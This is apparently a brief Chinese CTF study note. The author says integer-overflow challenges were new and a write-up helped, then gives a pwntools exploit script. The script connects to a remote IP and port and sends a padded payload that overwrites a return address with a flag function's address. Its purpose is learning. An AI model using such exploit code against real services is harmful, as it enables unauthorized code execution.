整数溢出的题目,之前从没做过,所以看了WriteUp。
1 2 3 4 5 6 7 8 9 | from pwn import * p = remote("111.198.29.45",56345) p.sendlineafter("Your choice:","1") p.sendlineafter("username:","123") flagAddr=0x0804868B payload=b'0'*(0x14+0x4)+p32(flagAddr)+b'0'*(0x105-0x8-0x14) print(len(payload)) p.sendlineafter("passwd:",payload) p.interactive() |